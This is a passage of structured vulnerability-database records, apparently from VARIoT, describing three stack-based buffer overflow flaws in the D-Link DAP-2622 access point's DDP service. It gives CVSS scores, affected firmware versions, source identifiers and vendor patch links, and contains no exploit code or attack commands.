"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set AG Profile Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20080. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-35752"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-35752",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1257",
"trust": 2.5
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20080",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29677",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"id": "VAR-202308-3425",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29677"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29677"
}
]
},
"last_update_date": "2025-12-19T22:28:22.925000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776416"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.8,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1257/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-35752"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-35752"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"date": "2024-05-03T02:15:39.703000",
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1257"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29677"
},
{
"date": "2025-05-14T02:36:00",
"db": "JVNDB",
"id": "JVNDB-2023-028895"
},
{
"date": "2025-05-13T13:54:13.600000",
"db": "NVD",
"id": "CVE-2023-35752"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028895"
}
],
"trust": 0.8
}
}
VAR-202308-3664
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set Date-Time Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20086. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3664",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
}
],
"trust": 0.7
},
"cve": "CVE-2023-41215",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29676",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41215",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41215",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-41215",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-41215",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-41215",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-41215",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-41215",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29676",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set Date-Time Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20086. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-41215"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"db": "VULMON",
"id": "CVE-2023-41215"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-41215",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1263",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20086",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29676",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-41215",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"db": "VULMON",
"id": "CVE-2023-41215"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"id": "VAR-202308-3664",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29676"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29676"
}
]
},
"last_update_date": "2025-12-19T22:28:22.892000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29676)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776421"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1263/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-41215"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-41215"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"db": "VULMON",
"id": "CVE-2023-41215"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"db": "VULMON",
"id": "CVE-2023-41215"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"date": "2024-05-03T03:15:33.307000",
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-05T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1263"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29676"
},
{
"date": "2025-05-14T09:04:00",
"db": "JVNDB",
"id": "JVNDB-2023-028906"
},
{
"date": "2025-05-13T14:00:48.510000",
"db": "NVD",
"id": "CVE-2023-41215"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028906"
}
],
"trust": 0.8
}
}
VAR-202308-3321
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set Date-Time Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20084. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3321",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
}
],
"trust": 0.7
},
"cve": "CVE-2023-35756",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29680",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35756",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35756",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35756",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-35756",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-35756",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-35756",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-35756",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29680",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1261"
},
{
"db": "CNVD",
"id": "CNVD-2025-29680"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028874"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
},
{
"db": "NVD",
"id": "CVE-2023-35756"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
